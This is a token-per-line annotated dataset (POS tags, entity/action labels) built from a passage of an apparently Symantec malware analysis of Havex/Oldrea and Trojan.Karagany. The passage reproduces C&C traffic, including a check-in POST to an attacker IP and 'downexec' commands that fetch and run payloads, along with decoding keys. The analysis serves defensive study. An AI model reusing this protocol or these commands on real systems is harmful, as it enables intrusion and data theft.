- HYPH O O
Encoding NNP O O
: : O O
chunked VBD O O
Connection NN O O
: : O O
keep VB O O
- HYPH O O
alive JJ O O
Server NNP O O
: : O O
Apache/1.3.37 NNP O O
( -LRB- O O
Unix NNP O O
) -RRB- O O
Cache NNP O O
- HYPH O O
Control NNP O O
: : O O
no DT O O
- HYPH O O
cache NN O O
9f65 CD O O
< XX O O
html><head><mega JJ O O
http NN O O
- HYPH O O
equiv='CACHE CD O O
- HYPH O O
CONTROL NN O O
' '' O O
content='NO NN O O
- HYPH O O
CACHE'></ NNP O O
head><body NN O O
> NFP O O
No UH O O
data!<!--havexQlpoOTFBWSZTWWYvDI0BOsD//////////////////////////////////// HYPH O O
/////////4oB+93VVXu69DuN7XYzds9yt49Ques NNS O O
[ -LRB- O O
... NFP O O
TRUNCATED NNP O O
FOR IN O O
READABILITY NN O O
] -RRB- O O
+ SYM O O
yUW3zfTxWAOstsCwCckdW5 NN O O
AH5Q6vbbCu7GputPt5CSfgPCAKXcAOOICMsqliACGYEhAQT3v9eD NN O O
M92D/8XckU4UJBmLwyNA==havex--></body></head JJ O O
> XX O O
Various JJ O O
samples NNS O O
process VBP O O
the DT O O
C&C NNP O O
responses NNS O O
differently RB O O
. . O O

In IN O O
one CD O O
example NN O O
, , O O
the DT O O
sample NN O O
searches NNS O O
for IN O O
the DT O O
data NNS O O
enclosed VBN O O
by IN O O
the DT O O
tag NN O O
' `` O O
havex NN O O
' '' O O
. . O O

Once IN O O
the DT O O
data NN O O
is VBZ O O
found VBN O O
, , O O
it PRP O O
is VBZ O O
decoded VBN O O
using VBG O O
standard NN O O
base64 NN O O
+ SYM O O
bzip2 NN O O
and CC O O
also RB O O
a DT O O
xor NN O O
layer NN O O
with IN O O
bytes NNS O O
from IN O O
the DT O O
string NN O O
1312312 CD O O
. . O O

The DT O O
decoded VBN O O
data NN O O
contains VBZ O O
a DT O O
small JJ O O
header NN O O
followed VBN O O
by IN O O
an DT O O
executable JJ O O
MZ NN O O
- HYPH O O
file NN O O
. . O O

Another DT O O
sample NN O O
was VBD O O
found VBN O O
to TO O O
use VB O O
standard JJ O O
base64 NN O O
+ CC O O
reverse VB O O
xor NN O O
+ SYM O O
RSA-2048 NN O O
for IN O O
decrypting VBG O O
received VBN O O
data NNS O O
. . O O

The DT O O
decrypted JJ O O
data NNS O O
consists VBZ O O
of IN O O
a DT O O
6 CD O O
byte NN O O
command NN O O
concatenated VBD O O
with IN O O
an DT O O
MZ NNP O O
file NN O O
. . O O

The DT O O
MZ NNP O O
file NN O O
is VBZ O O
compressed VBN O O
with IN O O
the DT O O
lzma NN O O
algorithm NN O O
. . O O

RSA NNP O O
keys NNS O O
for IN O O
decryption NN O O
, , O O
together RB O O
with IN O O
other JJ O O
initial JJ O O
configuration NN O O
information NN O O
, , O O
are VBP O O
stored VBN O O
in IN O O
the DT O O
registry NN O O
in IN O O
base64 NN O O
form NN O O
. . O O

This DT O O
section NN O O
includes VBZ O O
information NN O O
about IN O O
identified VBN O O
payloads NNS O O
downloaded VBN O O
by IN O O
Backdoor NNP O O
. . O O
Oldrea NNP O O
. . O O

The DT O O
following VBG O O
is VBZ O O
a DT O O
brief JJ O O
description NN O O
of IN O O
the DT O O
functionality NN O O
for IN O O
each DT O O
identified VBN O O
component NN O O
. . O O

Trojan NNP O O
. . O O
Karagany NNP O O
is VBZ O O
a DT O O
back NN O O
door NN O O
used VBN O O
primarily RB O O
for IN O O
recon NN O O
. . O O

It PRP B-Entity 1
is VBZ O O
designed VBN O O
to IN O O
download NN B-Action 2
and CC O O
install VB B-Action 3
additional JJ O O
files NNS B-Entity 4
and CC O O
exfiltrate NN B-Action 5
data NNS B-Entity 6
. . O O

Samples NNS O O
sometimes RB O O
use VBP O O
common JJ O O
binary JJ O O
packers NNS O O
such JJ O O
as IN O O
UPX NNP O O
and CC O O
Aspack NNP O O
on IN O O
top NN O O
of IN O O
a DT O O
custom NN O O
Delphi NNP O O
binary NN O O
packer NN O O
/ , O O
protector NN O O
for IN O O
the DT O O
payload NN O O
. . O O

Where WRB O O
present JJ O O
in IN O O
samples NNS O O
, , O O
the DT O O
Delphi NNP O O
packer NN O O
is VBZ O O
configured VBN O O
to TO O O
use VB O O
' `` O O
neosphere RB O O
' '' O O
as IN O O
a DT O O
key NN O O
to IN O O
decrypt VB O O
the DT O O
payload NN O O
. . O O

The DT O O
following VBG O O
is VBZ O O
a DT O O
brief JJ O O
overview NN O O
of IN O O
the DT O O
functionality NN O O
of IN O O
Trojan NNP O O
. . O O
Karagany NNP O O
. . O O

Trojan NNP O O
. . O O
Karagany NNP O O
creates VBZ O O
a DT O O
folder NN O O
in IN O O
the DT O O
user NN O O
APPDATA NNP O O
directory NN O O
and CC O O
chooses VBZ O O
the DT O O
directory NN O O
name NN O O
from IN O O
the DT O O
following JJ O O
list NN O O
. . O O

It PRP O O
copies VBZ O O
itself PRP O O
in IN O O
the DT O O
created VBN O O
directory NN O O
with IN O O
hidden JJ O O
and CC O O
system NN O O
attributes VBZ O O
using VBG O O
a DT O O
file NN O O
name NN O O
chosen VBN O O
from IN O O
the DT O O
following JJ O O
list NN O O
. . O O

Trojan NNP O O
. . B-Entity 1
Karagany NNP I-Entity O
copies NNS B-Action 2
itself PRP B-Entity 3
with IN B-Modifier 4
hidden VBN O O
and CC B-Entity 5
system NN I-Entity O
attributes VBZ I-Entity O
where WRB I-Entity O
it PRP I-Entity O
was VBD I-Entity O
first RB I-Entity O
executed VBN I-Entity O
as IN O O
err.log[DIGITS NN O O
] -RRB- O O
. . O O

It PRP O O
then RB O O
copies VBZ O O
the DT O O
legitimate JJ O O
chkdsk NN O O
utility NN O O
in IN O O
the DT O O
installation NN O O
folder NN O O
using VBG O O
the DT O O
payload NN O O
file NN O O
name NN O O
but CC O O
with IN O O
a DT O O
space NN O O
before IN O O
the DT O O
file NN O O
extension NN O O
. . O O

This DT O O
may MD O O
fool VB O O
ordinary JJ O O
users NNS O O
into IN O O
thinking NN O O
that IN O O
this DT O O
folder NN O O
contains VBZ O O
a DT O O
legitimate JJ O O
application NN O O
, , O O
for IN O O
example NN O O
PnPutil NNP O O
.exe NNP O O
. . O O

Trojan NNP O O
. . O O
Karagany!gen1 NNP O O
may MD O O
create VB O O
the DT O O
following VBG O O
additional JJ O O
files NNS O O
in IN O O
the DT O O
installation NN O O
folder NN O O
. . O O

It PRP O O
then RB O O
creates VBZ O O
a DT O O
C:\ProgramData\Mail\MailAg\gl NN O O
directory NN O O
as IN O O
a DT O O
temporary JJ O O
directory NN O O
used VBN O O
for IN O O
uploading VBG O O
files NNS O O
. . O O

Trojan NNP O O
. . O O
Karagany NNP O O
then RB O O
creates VBZ O O
a DT O O
link NN O O
to IN O O
itself PRP O O
in IN O O
the DT O O
Startup NNP O O
folder NN O O
as IN O O
an DT O O
autostart NN O O
when WRB O O
the DT O O
system NN O O
restarts NNS O O
. . O O

Trojan NNP O O
. . B-Entity 1
Karagany NNP I-Entity O
first JJ O O
checks NNS B-Action 2
for IN B-Modifier 3
a DT O O
live JJ B-Entity 4
Internet NN I-Entity O
connection NN I-Entity O
by IN B-Modifier 5
visiting VBG O O
Microsoft NNP B-Entity 6
or CC I-Entity O
Adobe NNP I-Entity O
websites VBZ I-Entity O
. . O O

It PRP B-Entity 1
will MD O O
only RB O O
reach VB B-Action 2
out IN I-Action O
to IN B-Modifier 3
its PRP$ O O
C&C NNP B-Entity 4
server NN I-Entity O
once RB O O
this DT O O
check NN O O
is VBZ O O
successful JJ O O
. . O O

Example NN O O
HTTP NNP O O
Requests NNPS O O
Internet NN O O
connection NN O O
test NN O O
to IN O O
Microsoft NNP O O
GET NNP O O
/en CD O O
- HYPH O O
us PRP O O
/ . O O
default.aspx JJ O O
HTTP/1.1 NNP O O
Accept NNP O O
- HYPH O O
Encoding NNP O O
: : O O
gzip NN O O
, , O O
deflate VB O O
Content JJ O O
- HYPH O O
Type NN O O
: : O O
application NN O O
/ , O O
x LS O O
- HYPH O O
www NN O O
- HYPH O O
form NN O O
- HYPH O O
urlencoded JJ O O
Host NN O O
: : O O
microsoft.com ADD O O
Cookie NN O O
: : O O
MC1=V=3&GUID=<32 JJ O O
character NN O O
guid NN O O
> CD O O
Connection NN O O
: : O O
Keep VB O O
- HYPH O O
Alive JJ O O
Cache NNP O O
- HYPH O O
control NN O O
: : O O
no DT O O
- HYPH O O
cache NN O O
Internet NN O O
connection NN O O
test NN O O
to IN O O
Adobe NNP O O
using VBG O O
identifiant NN O O
parameter NN O O
POST NNP O O
/geo . O O
/ SYM O O
productid.php RB O O
HTTP/1.1 JJ O O
Content JJ O O
- HYPH O O
Type NN O O
: : O O
application NN O O
/ , O O
x LS O O
- HYPH O O
www NN O O
- HYPH O O
form NN O O
- HYPH O O
urlencoded JJ O O
Host NN O O
: : O O
adobe.com ADD O O
... . O O

identifiant=51032 NN O O
_ NFP O O
175129256364 CD O O
Example NNP O O
POST NNP O O
request NN O O
for IN O O
C&C NNP O O
server NN O O
check NN O O
- HYPH O O
in IN O O
POST NNP O O
/check . O O
_ . O O
value.php NN O O
HTTP/1.1 NNP O O
User NNP O O
- HYPH O O
Agent NNP O O
: : O O
Mozilla/4.0 NNP O O
( -LRB- O O
compatible JJ O O
; : O O
MSIE NNP O O
7.0 CD O O
; : O O
Windows NNP O O
NT NNP O O
6.1 CD O O
; : O O
.NET CD O O
CLR NNP O O
2.0.50727 CD O O
) -RRB- O O
Host NN O O
: : O O
93.188.161.235 CD O O
... NFP O O

identifiant=51032 NN O O
_ . O O
1799883375637&version NN O O
= SYM O O
i2pver FW O O
HTTP NNP O O
response NN O O
example NN O O
HTTP/1.1 VBD O O
200 CD O O
OK JJ O O
Date NN O O
: : O O
Tue NNP O O
, , O O
28 CD O O
Jan NNP O O
2014 CD O O
05:59:58 CD O O
GMT NNP O O
Vary NNP O O
: : O O
Accept NNP O O
- HYPH O O
Encoding NNP O O
Content NN O O
- HYPH O O
Length NN O O
: : O O
324 CD O O
Content JJ O O
- HYPH O O
Type NN O O
: : O O
text NN O O
/ , O O
html NN O O
X NN O O
- HYPH O O
Powered VBN O O
- HYPH O O
By RP O O
: : O O
PHP/5.3.10 VB O O
- HYPH O O
1ubuntu3.9 NNP O O
Via NNP O O
: : O O
1.1 CD O O
host.alexsieff.com ADD O O
work:3|downexec NN O O
[ -LRB- O O
http://]93.188.161.235/check2/muees27jxt ADD O O
/ SYM O O
shot.jpg RB O O
; : O O
work:5|downexec XX O O
[ -LRB- O O
http://]93.188.161.235/check2/muees27jxt ADD O O
/ SYM O O
tl.jpg RB O O
; : O O
work:7|downexec XX O O
[ -LRB- O O
http://]93.188.161.235/check2/muees27jxt ADD O O
/ SYM O O
fl.jpg RB O O
; : O O
work:103|downexec XX O O
[ -LRB- O O
http://]93.188.161.235/check2/muees27jxt ADD O O
/ SYM O O
pdump.jpg RB O O
; : O O
work:118|downexec XX O O
[ -LRB- O O
http://]93.188.161.235/check2/muees27jxt ADD O O
/ SYM O O
fl.jpg NN O O
; : O O
The DT O O
POST NNP O O
data NNS O O
contains VBZ O O
the DT O O
operating NN O O
system NN O O
version NN O O
and CC O O
a DT O O
derived JJ O O
number NN O O
. . O O

User NN O O
- HYPH O O
Agent NN O O
tokens NNS O O
used VBN O O
in IN O O
C&C NNP O O
requests NNS O O
are VBP O O
hard JJ O O
- HYPH O O
coded JJ O O
. . O O

The DT O O
following VBG O O
two CD O O
examples NNS O O
have VBP O O
been VBN O O
observed VBN O O
. . O O

Regular JJ O O
expression NN O O
for IN O O
URL NNP O O
or CC O O
HTTP NNP O O
request NN O O
- HYPH O O
line NN O O
searches NNS O O
. . O O

Regular JJ O O
expression NN O O
for IN O O
file NN O O
system NN O O
searches NNS O O
. . O O

Karagany NNP O O
Yara NNP O O
rule NN O O
: : O O
Symantec NNP O O
Security NNP O O
Response NNP O O
﻿﻿ NNP O O
Symantec NNP O O
protects VBZ O O
the DT O O
world NN O O
's POS O O
information NN O O
and CC O O
is VBZ O O
the DT O O
global JJ O O
leader NN O O
in IN O O
security NN O O
, , O O
backup NN O O
, , O O
and CC O O
availability NN O O
solutions NNS O O
. . O O

Our PRP$ O O
innovative JJ O O
products NNS O O
and CC O O
services NNS O O
protect VBP O O
people NNS O O
and CC O O
information NN O O
in IN O O
any DT O O
environment NN O O
- : O O
from IN O O
the DT O O
smallest JJS O O
mobile JJ O O
device NN O O
to IN O O
the DT O O
enterprise NN O O
data NNS O O
center NN O O
to TO O O
cloud VB O O
- HYPH O O
based VBN O O
systems NNS O O
. . O O

Our PRP$ O O
industry NN O O
- HYPH O O
leading VBG O O
expertise NN O O
in IN O O
protecting VBG O O
data NNS O O
, , O O
identities NNS O O
, , O O
and CC O O
interactions NNS O O
gives VBZ O O
our PRP$ O O
customers NNS O O
confidence NN O O
in IN O O
a DT O O
connected JJ O O
world NN O O
. . O O

More JJR O O
information NN O O
is VBZ O O
available JJ O O
at IN O O
www.symantec.com ADD O O
or CC O O
by IN O O
connecting VBG O O
with IN O O
Symantec NNP O O
at IN O O
go.symantec.com/socialmedia NNP O O
. . O O

Headquartered VBN O O
in IN O O
Mountain NNP O O
View NNP O O
, , O O
Calif. NNP O O
, , O O
Symantec NNP O O
has VBZ O O
operations NNS O O
in IN O O
40 CD O O
countries NNS O O
. . O O

More JJR O O
information NN O O
is VBZ O O
available JJ O O
at IN O O
www.symantec.com ADD O O
. . O O

For IN O O
specific JJ O O
country NN O O
offices NNS O O
and CC O O
contact NN O O
numbers NNS O O
, , O O
please UH O O
visit VB O O
our PRP$ O O
website NN O O
. . O O

Symantec NNP O O
World NNP O O
Headquarters NNPS O O
350 CD O O
Ellis NNP O O
St. NNP O O

Mountain NNP O O
View NNP O O
, , O O
CA NNP O O
94043 CD O O
USA NNP O O
+ SYM O O
1 CD O O
( -LRB- O O
650 CD O O
) -RRB- O O
527 CD O O
- SYM O O
8000 CD O O
1 CD O O
( -LRB- O O
800 CD O O
) -RRB- O O
721 CD O O
- SYM O O
3934 CD O O
www.symantec.com NN O O
Copyright NN O O
2014 CD O O
Symantec NNP O O
Corporation NNP O O
. . O O

All DT O O
rights NNS O O
reserved VBN O O
. . O O

Symantec NNP O O
, , O O
the DT O O
Symantec NNP O O
Logo NNP O O
, , O O
and CC O O
the DT O O
Checkmark NNP O O
Logo NNP O O
are VBP O O
trademarks NNS O O
or CC O O
registered VBN O O
trademarks NNS O O
of IN O O
Symantec NNP O O
Corporation NNP O O
or CC O O
its PRP$ O O
affiliates NNS O O
in IN O O
the DT O O
U.S. NNP O O

and CC O O
other JJ O O
countries NNS O O
. . O O

Other JJ O O
names NNS O O
may MD O O
be VB O O
trademarks NNS O O
of IN O O
their PRP$ O O
respective JJ O O
owners NNS O O
. . O O

Any DT O O
technical JJ O O
information NN O O
that WDT O O
is VBZ O O
made VBN O O
available JJ O O
by IN O O
Symantec NNP O O
Corporation NNP O O
is VBZ O O
the DT O O
copyrighted JJ O O
work NN O O
of IN O O
Symantec NNP O O
Corporation NNP O O
and CC O O
is VBZ O O
owned VBN O O
by IN O O
Symantec NNP O O
Corporation NNP O O
. . O O

NO DT O O
WARRANTY NNP O O
. . O O

The DT O O
technical JJ O O
information NN O O
is VBZ O O
being VBG O O
delivered VBN O O
to IN O O
you PRP O O
as RB O O
is VBZ O O
and CC O O
Symantec NNP O O
Corporation NNP O O
makes VBZ O O
no DT O O
warranty NN O O
as IN O O
to IN O O
its PRP$ O O
accuracy NN O O
or CC O O
use NN O O
. . O O

Any DT O O
use NN O O
of IN O O
the DT O O
technical JJ O O
documentation NN O O
or CC O O
the DT O O
information NN O O
contained VBN O O
herein RB O O
is VBZ O O
at IN O O
the DT O O
risk NN O O
of IN O O
the DT O O
user NN O O
. . O O

Documentation NN O O
may MD O O
include VB O O
technical JJ O O
or CC O O
other JJ O O
inaccuracies NNS O O
or CC O O
typographical JJ O O
errors NNS O O
. . O O

Symantec JJ O O
reserves NNS O O
the DT O O
right NN O O
to TO O O
make VB O O
changes NNS O O
without IN O O
prior JJ O O
notice NN O O
. . O O

